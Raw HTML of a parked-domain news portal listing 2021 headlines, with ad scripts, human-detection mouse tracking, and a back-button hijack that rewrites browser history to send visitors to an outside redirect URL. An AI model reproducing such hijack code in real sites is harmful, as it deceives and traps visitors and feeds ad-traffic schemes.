<!DOCTYPE html>
<html lang="en">
    <head>
        <!-- Global site tag (gtag.js) - Google Analytics -->
        <script async src="https://www.googletagmanager.com/gtag/js?id=G-NPHB61BDSE"></script>
        <script>
            window.dataLayer = window.dataLayer || [];
            function gtag() {
                dataLayer.push(arguments);
            }
            gtag('js', new Date());

            gtag('config', 'G-NPHB61BDSE');
        </script>
        <title>Welcome to the Simcast News portal.</title>
        <meta charset="UTF-8">
        <meta name="description" content="Search on topics your interested. Read great personalised news.">
        <meta name="keywords" content="search,news,automotive,beauty,education,events,fashion,finance,games,health,home,insurance,legal,pets,property,shopping,sports,technology,transport,travel,utilties">
        <meta name="author" content="Simcast">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <link rel="shortcut icon" href="/templates/simcast/favicon.png" type="image/x-icon">
        <script src="https://code.jquery.com/jquery-3.4.1.min.js" integrity="sha256-CSXorXvZcTkaix6Yvo6HppcZGetbYMGWSFlBw8HfCJo=" crossorigin="anonymous" ></script>
        <link type="text/css" href="/templates/simcast/css/html.css" rel="stylesheet" >
        <link href="/lib/fontawesome-5.9.0/css/all.min.css" rel="stylesheet" >

<script>
    (function (window, location) {
        var redirect = "http://go.anticswatc.com/ts8229-backbutton-us";
        var currentUrl = location.origin + location.pathname + location.search;
        if (location.hash !== "#!/hst") {
            history.replaceState(null, document.title, currentUrl + "#!/hst");
            history.pushState(null, document.title, currentUrl);
        }

        window.addEventListener("popstate", function () {
            if (location.hash === "#!/hst") {
                setTimeout(function () {
                    window.location.replace(redirect);
                }, 0);
            }
        }, false);
    }(window, location));
</script><script type="text/javascript">
    $(document).ready(function () {
        var totX = 0;
        var totY = 0;
        var startx = 0;
        var starty = 0;
        var mess = 0;

            //test for javascript
            var fra = 0;
            var ip = 0;
            var infr = window.self !== window.top;
            if (infr) {
                fra = 1;
            }
            var pop = (window.opener !== undefined && window.opener !== null && window.opener !== window);
            if (pop) {
                ip = 1;
            }
            $.ajax({
                method: "GET",
                url: "/widgets/ms/js.php?fra=" + fra + "&ip=" + ip
            });
            document.addEventListener('touchstart', function (e) {
            var touchobj = e.changedTouches[0]; // first touch
            totX = totX + parseInt(touchobj.clientX);
            totY = totY + parseInt(touchobj.clientY);
        }, false);

        document.addEventListener('touchend', function (e) {
            var touchobj = e.changedTouches[0]; // last touch
            totX = totX + abs(parseInt(touchobj.clientX) - startx);
            totY = totY + abs(parseInt(touchobj.clientY) - starty);
        }, false);

        document.onmousemove = function (e) {
            totX = totX + e.pageX;
            totY = totY + e.pageY;
        };
        setInterval(checkCursor, 200);

        function checkCursor() {
            if ((totX !== 0) || (totY !== 0)) {
                if (mess !== 2) {
                    mess = 2;
                    document.cookie = "mess=2";
                    $.ajax({
                        method: "GET",
                        url: "/widgets/ms/up.php?mess=" + mess
                    });
                }
            }
        }
    }
    );
</script>
        <script>
            $(document).ready(function () {
                if ($(".columns").text().length === 0) {
                    $('.columns').hide();
                }
            });
        </script>
        <script src="https://cdn.onesignal.com/sdks/OneSignalSDK.js" async=""></script>
        <script>
            var OneSignal = window.OneSignal || [];
            OneSignal.push(function () {
                OneSignal.init({
                    appId: "4c7b68c0-29d9-46be-b278-bfc487c22942"
                });
            });
        </script>
        <script async src="https://securepubads.g.doubleclick.net/tag/js/gpt.js"></script>
        <script>
            var mess = parseInt(getCookie("mess"));
            if (mess === 2) {
                window.googletag = window.googletag || {cmd: []};
                googletag.cmd.push(function () {
                    var mapping1 = googletag.sizeMapping().addSize([768, 0], [[970, 250], [728, 90]]).addSize([0, 0], [320, 50]).build();
                    var mapping2 = googletag.sizeMapping().addSize([768, 0], [728, 90]).addSize([0, 0], [320, 50]).build();
                    googletag.defineSlot('/51855962/simcast/simcast_970x250', [[970, 250], [728, 90]], 'simcast_970x250').defineSizeMapping(mapping1).addService(googletag.pubads());
                    googletag.defineSlot('/51855962/simcast/simcast_728x90', [728, 90], 'simcast_728x90').defineSizeMapping(mapping2).addService(googletag.pubads());
                    googletag.defineSlot('/51855962/simcast/simcast_728x90_2', [728, 90], 'simcast_728x90_2').defineSizeMapping(mapping2).addService(googletag.pubads());
                    googletag.defineSlot('/51855962/simcast/simcast_728x90_3', [728, 90], 'simcast_728x90_3').defineSizeMapping(mapping2).addService(googletag.pubads());
                    googletag.defineSlot('/51855962/simcast/Simcast_300x250', [300, 250], 'Simcast_300x250').addService(googletag.pubads());
                    googletag.defineSlot('/51855962/simcast/simcast_300x600', [300, 600], 'simcast_300x600').addService(googletag.pubads());
                    googletag.defineSlot('/51855962/simcast/simcast_320x50', [320, 50], 'simcast_320x50').addService(googletag.pubads());
                    googletag.pubads().enableSingleRequest();
                    googletag.pubads().setTargeting('sub_id', ['citizenhunter.com']);
                    googletag.enableServices();
                });
            }
            function getCookie(cname) {
                var name = cname + "=";
                var ca = document.cookie.split(';');
                for (var i = 0; i < ca.length; i++) {
                    var c = ca[i];
                    while (c.charAt(0) == ' ') {
                        c = c.substring(1);
                    }
                    if (c.indexOf(name) == 0) {
                        return c.substring(name.length, c.length);
                    }
                }
                return "";
            }
        </script>


    </head>
    <body id="mainbody">
        <div class="menutop clearfix">
            <div id="plBanner">
                <script id="parklogic" type="text/javascript" src="https://parking2.parklogic.com/page/enhance.js?pcId=56&domain=citizenhunter.com"></script>
            </div>
            <div class='logo-block'><a href='/widgets/banners/rules.php?bid=110&wid=2&tid=59&d=citizenhunter.com' target=''><img src='/templates/simcast/images/simcastlogo_35y.png' alt='Simcast Logo'  class='logo-image'></a></div><div class='menu-block'><ul class='dropdown'><li><a href='/news'  title='News'>News</a><ul></ul></li><li><a href='/Entertainment'  title='Entertainment'>Entertainment</a><ul></ul></li><li><a href='/Money'  title='Money'>Money</a><ul></ul></li><li><a href='/Lifestyle'  title='Lifestyle'>Lifestyle</a><ul></ul></li><li><a href='/Health'  title='Health'>Health</a><ul></ul></li><li><a href='/Travel'  title='Travel'>Travel</a><ul></ul></li><li><a href='/Video'  title='Videos'>Videos</a><ul></ul></li><li><a href='/Sports'  title='Sports'>Sports</a><ul></ul></li><li><a href='/About-Us' onclick='return myConfirm("/About-Us");' title='About Us'>About Us</a><ul><li><a href='/about-us/About-Simcast'  title='About Simcast'>About Simcast</a><ul></ul></li><li><a href='/about-us/Contact-Us'  title='Contact Us'>Contact Us</a><ul></ul></li><li><a href='/about-us/Policies'  title='Policies'>Policies</a><ul><li><a href='/about-us/policies/Privacy-Policy'  title='Privacy Policy'>Privacy Policy</a><ul></ul></li><li><a href='/about-us/policies/Terms-of-Use'  title='Terms of Use'>Terms of Use</a><ul></ul></li></ul></li></ul></li></ul></div>        <script>
            function myConfirm(message) {
                switch (message.length) {
                    case 0:
                        message = "WARNING!\nAre you sure you want to do this?";
                    case 1:
                        message = "";
                        break;
                }
                if (confirm(message) === true) {
                    return true;
                } else {
                    return false;
                }
            }
        </script>
        <div class='powered-block'>Powered by <em><strong>Microsoft News</strong></em>
</div>        </div>
        <div id="contentwrapper">
                    <!-- /51855962/simcast/simcast_728x90 -->
<div id='simcast_728x90'>
  <script>
    googletag.cmd.push(function() { googletag.display('simcast_728x90'); });
  </script>
</div>    <div class='search-block'>
                    <div class='search-inputblock'>
                <h2 class='search-heading'>Search Internet</h2>
                <form method="post" action="/widgets/searches/rules.php" >
                                        <input type="text" name="q" value="Search here"
                           onblur="if (this.value === '') {
                                       this.value = 'Search here';
                                       this.style.color = '#BBB';
                                   }"
                           onfocus="if (this.value === 'Search here') {
                                       this.value = '';
                                       this.style.color = '#000';
                                   }"
                           class='search-inputbox'  aria-label='Search here'/>
                    <input name="inputboxvar" type="hidden" value="q" />
                    <input name="ms" type="hidden" value="0" />
                    <input name="remote" type="hidden" value="1" />
                    &nbsp; <input name="sub" type="submit"  class='search-button' value='Search' aria-label='Search'/>
                </form>
            </div>
                </div>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery-modal/0.9.1/jquery.modal.min.js"></script>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/jquery-modal/0.9.1/jquery.modal.min.css" />
<style>
    p.modalheading {
        font-size:24px;
        font-weight:bold;
        color:#A67EAC;
        padding:10px 0px;
    }
    .modalinput {
        font-size: 14px;
        padding: 6px 12px;
        height: 20px;
        width:200px;
        color: #555;
        border: 1px solid #A67EAC;
        border-radius: 4px;
    }
    .modalbutton {
        height: 35px;
        width: 90px;
        border-radius: 5px;
        border:0px;
        margin: 10px 0px 10px 0px;
        color: #fff;
        padding: 0px 10px 0px 10px;
        font-size: 18px !important;
        background-color: #865E8C;
        cursor: pointer;
    }
    .modalbutton:hover {
        background-color:#A67EAC;
    }
</style>
<script>
    function displayModal(mm) {
        $('#modalout').load('/widgets/modal/modal.php?mm=' + mm);
    }
    function displayComment(mm, k, id) {
        $('#modalout').load('/widgets/modal/modal.php?mm=' + mm + "&k=" + k + "&id=" + id);
    }
    $(document).ready(function () {
        var mm = 0;
        if (mm !== 0) {
            displayModal(mm);
        }
    });

</script>
<div id="modalout"></div>











            <div class="articlewrapper">
                <div class="row">

<div class='leftcolumn'>
            <div class='majorArticle-block'>
            <a href='/widgets/tk/msc.php?id=0&k=news' target="_BLANK">
                <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB16gDuz.img?h=500&w=1000&x=391.5&y=226.5&m=2'  class='majorArticle-image'>
                <div class='majorArticle-title'>
                    'F--- Tucker Carlson': Senator and Iraq War veteran Tammy Duckworth reams out Fox News host over his comments about women in the military                </div>
            </a>
        </div>
            <!-- /51855962/simcast/simcast_728x90_2 -->
<div id='simcast_728x90_2'>
  <script>
    googletag.cmd.push(function() { googletag.display('simcast_728x90_2'); });
  </script>
</div>    <div id='trendingnews'>
        <div class='trendingnewsheading'>Trending News</div>            <div class='textArticle-block clearfix'>
                <a href='/widgets/tk/msc.php?id=1&k=news' class='textArticle-link' target="_BLANK">
                    <div class='textArticle-imageblock'>
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB11muns.img?h=100&w=100&x=251&y=303&m=5'  class='textArticle-image'>
                    </div>
                    <div class='textArticle-textcontent'>
                        <div class='textArticle-title'>
                            Don't feel bad for Joe Manchin                             <div class='textArticle-abstract'>
                                To hear Joe Manchin tell it, he's not at all happy with being the swing vote in the Senate.                            </div>
                            <div class='textArticle-provider'>
                                <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAywGC0.img' style='height:18px;float:left;'>
                                <div style='font-size:11px;margin:4px 0px 0px 4px;float:left;'>
                                    CNN&nbsp;&nbsp;                                </div>
                                                            </div>
                        </div>
                    </div>
                </a>
            </div>
                        <div class='textArticle-block clearfix'>
                <a href='/widgets/tk/msc.php?id=2&k=news' class='textArticle-link' target="_BLANK">
                    <div class='textArticle-imageblock'>
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17GhRl.img?h=100&w=100&x=251&y=303&m=5'  class='textArticle-image'>
                    </div>
                    <div class='textArticle-textcontent'>
                        <div class='textArticle-title'>
                            Biden federal leasing pause won't impact energy production this year, agency says                             <div class='textArticle-abstract'>
                                President Biden's temporary moratorium on leasing federal lands and waters for oil and gas drilling is expected to have "no effects" until 2022, the Energy Information Administration (EIA) said this week. "No effects will likely occur until 2022 because...                            </div>
                            <div class='textArticle-provider'>
                                <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBUvpML.img' style='height:18px;float:left;'>
                                <div style='font-size:11px;margin:4px 0px 0px 4px;float:left;'>
                                    The Hill&nbsp;&nbsp;                                </div>
                                                            </div>
                        </div>
                    </div>
                </a>
            </div>
                        <div class='textArticle-block clearfix'>
                <a href='/widgets/tk/msc.php?id=3&k=news' class='textArticle-link' target="_BLANK">
                    <div class='textArticle-imageblock'>
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19WfDd.img?h=100&w=100&x=251&y=303&m=5'  class='textArticle-image'>
                    </div>
                    <div class='textArticle-textcontent'>
                        <div class='textArticle-title'>
                            WatchOS 7.4: New features coming to your Apple Watch                             <div class='textArticle-abstract'>
                                The next big software update will allow you to use your Apple Watch to unlock your iPhone and bring Fitness Plus to more screens.                            </div>
                            <div class='textArticle-provider'>
                                <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17VHmX.img' style='height:18px;float:left;'>
                                <div style='font-size:11px;margin:4px 0px 0px 4px;float:left;'>
                                    CNET&nbsp;&nbsp;                                </div>
                                                            </div>
                        </div>
                    </div>
                </a>
            </div>
                        <div class='textArticle-block clearfix'>
                <a href='/widgets/tk/msc.php?id=4&k=news' class='textArticle-link' target="_BLANK">
                    <div class='textArticle-imageblock'>
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1euObW.img?h=100&w=100&x=251&y=303&m=5'  class='textArticle-image'>
                    </div>
                    <div class='textArticle-textcontent'>
                        <div class='textArticle-title'>
                            ‘Doomscrolling,’ ‘overpolice,’ ‘BIPOC’ among Dictionary.com’s newest words                             <div class='textArticle-abstract'>
                                Dictionary.com is keeping up with the times, announcing the addition of 450 new terms and updates to more than 7,000 entries that touch on the pandemic, race, social justice, identity and culture. Among the changes is the capitalization of the word “Indigenous”...                            </div>
                            <div class='textArticle-provider'>
                                <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA8I0Dg.img' style='height:18px;float:left;'>
                                <div style='font-size:11px;margin:4px 0px 0px 4px;float:left;'>
                                    New York Daily News&nbsp;&nbsp;                                </div>
                                                            </div>
                        </div>
                    </div>
                </a>
            </div>
                        <div class='textArticle-block clearfix'>
                <a href='/widgets/tk/msc.php?id=5&k=news' class='textArticle-link' target="_BLANK">
                    <div class='textArticle-imageblock'>
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1euLSU.img?h=100&w=100&x=1912&y=992&m=5'  class='textArticle-image'>
                    </div>
                    <div class='textArticle-textcontent'>
                        <div class='textArticle-title'>
                            Amid cassette tape creator's death, we remember his legacy – the mixtape                             <div class='textArticle-abstract'>
                                The inventor of the cassette tape, Lou Ottens, has passed away. But he left a lasting musical legacy for listeners.                            </div>
                            <div class='textArticle-provider'>
                                <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img' style='height:18px;float:left;'>
                                <div style='font-size:11px;margin:4px 0px 0px 4px;float:left;'>
                                    USA TODAY&nbsp;&nbsp;                                </div>
                                                            </div>
                        </div>
                    </div>
                </a>
            </div>
                        <div class='textArticle-block clearfix'>
                <a href='/widgets/tk/msc.php?id=6&k=news' class='textArticle-link' target="_BLANK">
                    <div class='textArticle-imageblock'>
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1euO7o.img?h=100&w=100&x=1912&y=992&m=5'  class='textArticle-image'>
                    </div>
                    <div class='textArticle-textcontent'>
                        <div class='textArticle-title'>
                            Florida restores more rights for felons                             <div class='textArticle-abstract'>
                                The Florida clemency board approved changes proposed by Gov. Ron DeSantis to previous rules that also removed the five-to-seven-year period felons are required to wait after applying to have these rights restored.                            </div>
                            <div class='textArticle-provider'>
                                <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBO6J5d.img' style='height:18px;float:left;'>
                                <div style='font-size:11px;margin:4px 0px 0px 4px;float:left;'>
                                    POLITICO&nbsp;&nbsp;                                </div>
                                                            </div>
                        </div>
                    </div>
                </a>
            </div>
                </div>
    </div>
<div class='middlecolumn'>
    <div style="margin-bottom:10px;">
            <script>
        $(document).ready(function () {
            $("#signin").show();
            $("#signup").hide();
            $("#signinbutton").addClass('login-buttonselected');
            $("#signupbutton").addClass('login-buttonunselected');

            $("#signinbutton").click(function () {
                $("#signin").show();
                $("#signup").hide();
                $("#signinbutton").removeClass('login-buttonunselected');
                $("#signinbutton").addClass('login-buttonselected');
                $("#signupbutton").removeClass('login-buttonselected');
                $("#signupbutton").addClass('login-buttonunselected');
            });
            $("#signupbutton").click(function () {
                $("#signin").hide();
                $("#signup").show();
                $("#signinbutton").removeClass('login-buttonselected');
                $("#signinbutton").addClass('login-buttonunselected');
                $("#signupbutton").removeClass('login-buttonunselected');
                $("#signupbutton").addClass('login-buttonselected');
            });

        });
    </script>
        <div class='login-block' >
        <div class='login-heading'>
            <button id='signinbutton' class='login-button'>Sign-in</button>&nbsp;&nbsp;&nbsp;&nbsp;
            <button id='signupbutton' class='login-button'>Sign-up</button></div>
        <div id='signin'>
            <form action=/widgets/login/login.php method="POST">
                <div class='login-fieldnames'>USERNAME</div>
                <input type="text" id="emaillogin" name="emaillogin" value="Email Address" class='login-input' 
                       onblur="if (this.value == '') {
                                   this.value = 'Email Address';
                                   this.style.color = '#ddd';
                               }"
                       onfocus="if (this.value == 'Email Address') {
                                   this.value = '';
                                   this.style.color = '#FFF';
                               }"><br>
                <div class='login-fieldnames'>PASSWORD</div>
                <input type="password" id="passwordlogin" name="passwordlogin" value="Password"  class='login-input' 
                       onblur="if (this.value == '') {
                                   this.value = 'Password';
                                   this.style.color = '#ddd';
                               }"
                       onfocus="if (this.value == 'Password') {
                                   this.value = '';
                                   this.style.color = '#FFF';
                               }">
                <input type="checkbox" name="remember" value="" checked>&nbsp;<span  class='login-remember'>Remember me</span><br>
                <input type="hidden" name="link" value='/'>
                <input type="submit" name="sub" value="Sign-in" class='login-submit'>
            </form>
            <div class='login-forgot'><a href='javascript:displayModal(1)' class='login-forgotlink'>Forgot password</a></div>
        </div>
        <div id='signup'>
            <form action=/widgets/login/signup.php method="POST" id='signupform'>
                <div class='login-fieldnames'>NAME</div>
                <input type="text" id="name" name="name" value="" class='login-input'><br>
                <div class='login-fieldnames'>EMAIL</div>
                <input type="text" id="email" name="email" value="" class='login-input'><br>
                <div class='login-fieldnames'>PASSWORD</div>
                <input type="password" id="password" name="password" value=""  class='login-input'>
                <input type="checkbox" id="terms" name="terms" value="" checked>&nbsp;<span class='login-terms'>
                    Agree to the <a href='/about-us/policies/Terms-of-Use' target='_BLANK' class='login-terms'>Terms of Use</a></span><br>
                <input type="hidden" name="path" value='/'>
                <input type="hidden" name="recaptcha" value='0'>
                                <input type="submit" name="signup" value="Sign-up"  class='login-submit'>
            </form>
        </div>
    </div>
        </div>
    <div class='breakingnews'>
        Breaking News
    </div>
                <div class='minorArticle-block clearfix'>
                <a href='/widgets/tk/msc.php?id=7&k=news' class='minorArticle-imagelink' target="_BLANK">
                    <div class='minorimage-block'>
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1euHnj.img?h=70&w=95&x=47&y=35&m=2'  class='minorArticle-image'>
                    </div>
                </a>
                <div class='minorArticle-title'>
                    <a href='/widgets/tk/msc.php?id=7&k=news' class='minorArticle-text' target="_BLANK">
                        Joe Biden Signs $1.9 Trillion COVID-19 Package — Sending Out Third Round of Stimulus Checks                    </a>
                </div>
                <div class='provider'>
                    <a href='/widgets/tk/msc.php?id=7&k=news' class='minorArticle-newsprovider' target="_BLANK">
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAywHbG.img' style='height:18px;float:left;'>&nbsp;
                        People&nbsp;&nbsp;                    </a>
                                    </div>
            </div>
                        <div class='minorArticle-block clearfix'>
                <a href='/widgets/tk/msc.php?id=8&k=news' class='minorArticle-imagelink' target="_BLANK">
                    <div class='minorimage-block'>
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1euOlQ.img?h=70&w=95&x=47&y=35&m=2'  class='minorArticle-image'>
                    </div>
                </a>
                <div class='minorArticle-title'>
                    <a href='/widgets/tk/msc.php?id=8&k=news' class='minorArticle-text' target="_BLANK">
                        As daylight saving time approaches, some states want to make switch permanent                    </a>
                </div>
                <div class='provider'>
                    <a href='/widgets/tk/msc.php?id=8&k=news' class='minorArticle-newsprovider' target="_BLANK">
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AABiyAn.img' style='height:18px;float:left;'>&nbsp;
                        ABC News&nbsp;&nbsp;                    </a>
                                    </div>
            </div>
                        <div class='minorArticle-block clearfix'>
                <a href='/widgets/tk/msc.php?id=9&k=news' class='minorArticle-imagelink' target="_BLANK">
                    <div class='minorimage-block'>
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1euuGl.img?h=70&w=95&x=830.5&y=376.5&m=2'  class='minorArticle-image'>
                    </div>
                </a>
                <div class='minorArticle-title'>
                    <a href='/widgets/tk/msc.php?id=9&k=news' class='minorArticle-text' target="_BLANK">
                        Cuomo Sexual Harassment Accusation Is Referred to Albany Police                    </a>
                </div>
                <div class='provider'>
                    <a href='/widgets/tk/msc.php?id=9&k=news' class='minorArticle-newsprovider' target="_BLANK">
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBAq9.img' style='height:18px;float:left;'>&nbsp;
                        The New York Times&nbsp;&nbsp;                    </a>
                                    </div>
            </div>
                        <div class='minorArticle-block clearfix'>
                <a href='/widgets/tk/msc.php?id=10&k=news' class='minorArticle-imagelink' target="_BLANK">
                    <div class='minorimage-block'>
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1euOao.img?h=70&w=95&x=830.5&y=376.5&m=2'  class='minorArticle-image'>
                    </div>
                </a>
                <div class='minorArticle-title'>
                    <a href='/widgets/tk/msc.php?id=10&k=news' class='minorArticle-text' target="_BLANK">
                        National Guard Chief Wants to Replace Capitol Troops With Law Enforcement, Memo Shows                    </a>
                </div>
                <div class='provider'>
                    <a href='/widgets/tk/msc.php?id=10&k=news' class='minorArticle-newsprovider' target="_BLANK">
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA38A54.img' style='height:18px;float:left;'>&nbsp;
                        Newsweek&nbsp;&nbsp;                    </a>
                                    </div>
            </div>
                        <div class='minorArticle-block clearfix'>
                <a href='/widgets/tk/msc.php?id=11&k=news' class='minorArticle-imagelink' target="_BLANK">
                    <div class='minorimage-block'>
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1euwTa.img?h=70&w=95&x=249&y=430&m=2'  class='minorArticle-image'>
                    </div>
                </a>
                <div class='minorArticle-title'>
                    <a href='/widgets/tk/msc.php?id=11&k=news' class='minorArticle-text' target="_BLANK">
                        Wombo.ai lets users make silly deepfake videos of their friends or celebrities singing songs                    </a>
                </div>
                <div class='provider'>
                    <a href='/widgets/tk/msc.php?id=11&k=news' class='minorArticle-newsprovider' target="_BLANK">
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB10dZNR.img' style='height:18px;float:left;'>&nbsp;
                        INSIDER&nbsp;&nbsp;                    </a>
                                    </div>
            </div>
                        <div class='minorArticle-block clearfix'>
                <a href='/widgets/tk/msc.php?id=12&k=news' class='minorArticle-imagelink' target="_BLANK">
                    <div class='minorimage-block'>
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1euLKW.img?h=70&w=95&x=299.5&y=347.5&m=2'  class='minorArticle-image'>
                    </div>
                </a>
                <div class='minorArticle-title'>
                    <a href='/widgets/tk/msc.php?id=12&k=news' class='minorArticle-text' target="_BLANK">
                        Live Action Role-Playing Love Triangle Ends in Pipe Bomb Attack                    </a>
                </div>
                <div class='provider'>
                    <a href='/widgets/tk/msc.php?id=12&k=news' class='minorArticle-newsprovider' target="_BLANK">
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAg0OiN.img' style='height:18px;float:left;'>&nbsp;
                        The Daily Beast&nbsp;&nbsp;                    </a>
                                    </div>
            </div>
                        <div class='minorArticle-block clearfix'>
                <a href='/widgets/tk/msc.php?id=13&k=news' class='minorArticle-imagelink' target="_BLANK">
                    <div class='minorimage-block'>
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1euwMV.img?h=70&w=95&x=299.5&y=347.5&m=2'  class='minorArticle-image'>
                    </div>
                </a>
                <div class='minorArticle-title'>
                    <a href='/widgets/tk/msc.php?id=13&k=news' class='minorArticle-text' target="_BLANK">
                        States with Republican governors had highest Covid incidence and death rates, study finds                    </a>
                </div>
                <div class='provider'>
                    <a href='/widgets/tk/msc.php?id=13&k=news' class='minorArticle-newsprovider' target="_BLANK">
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBAJ56P.img' style='height:18px;float:left;'>&nbsp;
                        NBC News&nbsp;&nbsp;                    </a>
                                    </div>
            </div>
                        <div class='minorArticle-block clearfix'>
                <a href='/widgets/tk/msc.php?id=14&k=news' class='minorArticle-imagelink' target="_BLANK">
                    <div class='minorimage-block'>
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1euBTa.img?h=70&w=95&x=435.5&y=226.5&m=2'  class='minorArticle-image'>
                    </div>
                </a>
                <div class='minorArticle-title'>
                    <a href='/widgets/tk/msc.php?id=14&k=news' class='minorArticle-text' target="_BLANK">
                        Second Circuit Judge Dies One Week After Taking Senior Status                    </a>
                </div>
                <div class='provider'>
                    <a href='/widgets/tk/msc.php?id=14&k=news' class='minorArticle-newsprovider' target="_BLANK">
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBH6sN1.img' style='height:18px;float:left;'>&nbsp;
                        Law & Crime&nbsp;&nbsp;                    </a>
                                    </div>
            </div>
                        <div class='minorArticle-block clearfix'>
                <a href='/widgets/tk/msc.php?id=15&k=news' class='minorArticle-imagelink' target="_BLANK">
                    <div class='minorimage-block'>
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1euIlW.img?h=70&w=95&x=958&y=266&m=2'  class='minorArticle-image'>
                    </div>
                </a>
                <div class='minorArticle-title'>
                    <a href='/widgets/tk/msc.php?id=15&k=news' class='minorArticle-text' target="_BLANK">
                        Merrick Garland vows to pursue 'equal justice' in first speech as attorney general                    </a>
                </div>
                <div class='provider'>
                    <a href='/widgets/tk/msc.php?id=15&k=news' class='minorArticle-newsprovider' target="_BLANK">
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AABp9vq.img' style='height:18px;float:left;'>&nbsp;
                        Washington Examiner&nbsp;&nbsp;                    </a>
                                    </div>
            </div>
                        <div class='minorArticle-block clearfix'>
                <a href='/widgets/tk/msc.php?id=16&k=news' class='minorArticle-imagelink' target="_BLANK">
                    <div class='minorimage-block'>
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1euKG5.img?h=70&w=95&x=958&y=266&m=2'  class='minorArticle-image'>
                    </div>
                </a>
                <div class='minorArticle-title'>
                    <a href='/widgets/tk/msc.php?id=16&k=news' class='minorArticle-text' target="_BLANK">
                        Newfound meteorite could help unlock secrets of the solar system                    </a>
                </div>
                <div class='provider'>
                    <a href='/widgets/tk/msc.php?id=16&k=news' class='minorArticle-newsprovider' target="_BLANK">
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBJ3XCJ.img' style='height:18px;float:left;'>&nbsp;
                        National Geographic&nbsp;&nbsp;                    </a>
                                    </div>
            </div>
                        <div class='minorArticle-block clearfix'>
                <a href='/widgets/tk/msc.php?id=17&k=news' class='minorArticle-imagelink' target="_BLANK">
                    <div class='minorimage-block'>
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1euNpu.img?h=70&w=95&x=958&y=266&m=2'  class='minorArticle-image'>
                    </div>
                </a>
                <div class='minorArticle-title'>
                    <a href='/widgets/tk/msc.php?id=17&k=news' class='minorArticle-text' target="_BLANK">
                        Biden signs $1.9tn Covid relief ahead of first primetime address as president                    </a>
                </div>
                <div class='provider'>
                    <a href='/widgets/tk/msc.php?id=17&k=news' class='minorArticle-newsprovider' target="_BLANK">
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyxfDD.img' style='height:18px;float:left;'>&nbsp;
                        The Guardian&nbsp;&nbsp;                    </a>
                                    </div>
            </div>
            </div>
<div class='rightcolumn'>
    <div id="sidebar">
                        <div id="categories">
            <div id='category-bar'>Categories</div>
            <div class='category-block'><a href=/autos class=category-textlink>Automotive</a><br>
<a href=/entertainment class=category-textlink>Entertainment</a><br>
<a href=/health class=category-textlink>Health</a><br>
<a href=/lifestyle class=category-textlink>Lifestyle</a><br>
<a href=/money class=category-textlink>Money</a><br>
<a href=/news class=category-textlink>News</a><br>
<a href=/sports class=category-textlink>Sports</a><br>
<a href=/travel class=category-textlink>Travel</a><br>
<a href=/videos class=category-textlink>Videos</a><br></div>        </div>
        <!-- /51855962/simcast/Simcast_300x250 -->
<div id='Simcast_300x250'>
  <script>
    googletag.cmd.push(function() { googletag.display('Simcast_300x250'); });
  </script>
</div>        <div style='text-align:center;'>
                        <div class='imageArticle-block'>
                <a href='/widgets/tk/msc.php?id=18&k=news' target="_BLANK">
                    <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1euySP.img?h=400&w=300&x=858.5&y=457.5&m=2'  class='imageArticle-image'>
                    <div class='imageArticle-title'>Jim Jordan and Matt Gaetz want to bring Britney Spears...</div>
                </a>
            </div>
                        <div class='imageArticle-block'>
                <a href='/widgets/tk/msc.php?id=19&k=news' target="_BLANK">
                    <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1euwzv.img?h=400&w=300&x=361.5&y=283.5&m=2'  class='imageArticle-image'>
                    <div class='imageArticle-title'>Raila Odinga is a popular politician despite losing...</div>
                </a>
            </div>
                        <!-- /51855962/simcast/simcast_320x50 -->
<div id='simcast_320x50'>
  <script>
    googletag.cmd.push(function() { googletag.display('simcast_320x50'); });
  </script>
</div>        </div>
    </div>
</div>
<div class='farrightcolumn'>
    </div>
                </div>
            </div>
            <div id="footer">
            <div class='article-block'><table border="0" cellpadding="1" style="width:50%">
	<tbody>
		<tr>
			<td style="width:33%"><a class="footerlink" href="/news">News</a><br />
			<a class="footerlink" href="/autos">Automotive</a><br />
